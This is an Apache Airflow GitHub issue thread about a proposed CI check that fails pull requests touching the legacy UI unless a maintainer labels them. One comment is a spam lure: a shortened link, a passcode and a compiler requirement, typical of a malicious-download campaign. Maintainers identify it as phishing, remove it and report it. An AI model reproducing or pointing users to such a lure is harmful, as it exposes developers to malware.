### ISSUE TITLE
Fail the PR if it modifies old "ui"

### ISSUE THREAD

**Issue by potiuk** [apache/airflow#42031]
In case PR contains changes to the "old" uI ("airflow/www") and the PR does not have the "legacy UI" label set by the maintainer, the PR should fail. This is in order to limit changes that are implemented in the old UI to only bugfixes and necessary changes to enable "new UI" in Airflow 3.0.

This can be easily done via producing the right outputs in Breeze's selective checks.

* Breeze already has features to see if files in the incoming PR have belong to certain "file group" (and we have both "WWW" and "UI" groups defined
* Breeze already has access to labels that are assigned to PR

So it shoudl be as easy as simply exiting with error in selective checks and informing the user `Please ask maintainer to assign the "legacy UI" label to the PR in order to continue`

**Comment by potiuk** [comment]
Depends on a consensus in https://lists.apache.org/thread/db69p9fyt34d5tgo8pywpsp8ybjvflry

**Comment by pierrejeambrun** [comment]
> Depends on a consensus in https://lists.apache.org/thread/db69p9fyt34d5tgo8pywpsp8ybjvflry

Yes depending on the outcome we might also want to add the `api_connexion` folder as we will also most likely migrate public endpoints to FastAPI and want to also limit contributions in that area.

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by pierrejeambrun** [comment]
Deleted a spam comment that looked like fishing with links to external weird looking URL. We might want want to pay attention to that user.

**Comment by potiuk** [comment]
Yes. This is something we discuss in security groups (various) - there are currently very active actors with sophisticated methods where GitHub issues and PRs are getting used  example here: https://socket.dev/blog/github-users-targeted-by-new-wave-of-spambots-promoting-malicious-downloads

I will write an email to devlist for people to be aware of it. The best we can do (I just did it) is to report such attempts to Github via "Report" button. This can be done pretty easily and they react rather quickly

**Comment by bugraoz93** [comment]
Do you think this issue is ready to be picked up? It looks like there is no one against it. Everyone was also informed about the new construction on FastAPI while some endpoints have already moved.

**Comment by bbovenzi** [comment]
@bugraoz93 Go for it.

**Comment by pierrejeambrun** [comment]
Just assigned you @bugraoz93 :)

**Comment by bugraoz93** [comment]
Awesome, thanks both! :)
